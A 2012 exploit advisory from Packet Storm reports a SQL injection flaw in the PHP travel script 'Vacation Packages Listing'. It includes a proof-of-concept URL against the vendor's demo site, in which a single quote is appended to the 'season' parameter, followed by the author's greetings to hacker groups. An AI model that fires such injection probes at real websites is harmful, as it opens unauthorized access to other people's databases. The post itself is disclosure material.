Vacation Packages Listing suffers from a remote SQL injection vulnerability.
06d51cfd5847e2d01f1e210c5f047b2e87a6e3ddd64f16f5bdb612d879290496# Exploit Title: VACATION PACKAGES LISTING Sql Injection
# Date: 19/03/2012
# Author: r45c4l
# Script url: http://www.classifiedsgeek.com/vacation-packages/
# Version: N/A
# CVE : ()
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Product Description :
Vacation packages listing is a PHP travel script & travel deals software for travel agencies and tour operators to manage dynamic vacation packages and travel deals.
Product Cost : $119.00
===============================Exploit=================================================
---ICW---
[ EXPL0!T ]
SQL Injection
Note: Tested on demo site
p0c - http://www.classifiedsgeek.com/vacation-packages/demo.php?controller=Listings&action=search&listing_search=1&season=2'
===========================================================================
Greetz to : Beenu Arora, Godwin Austin, Eberly, b0nd, the_empty_, micr0, Hoody, sam, Sai Satish
All members of ICW, AH, G4H and darkc0de and all Indian Hackers
Special Greetz to : b4ltazar and s1nn3r
# Email: infosecpirate@gmail.com
=== End () ====
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed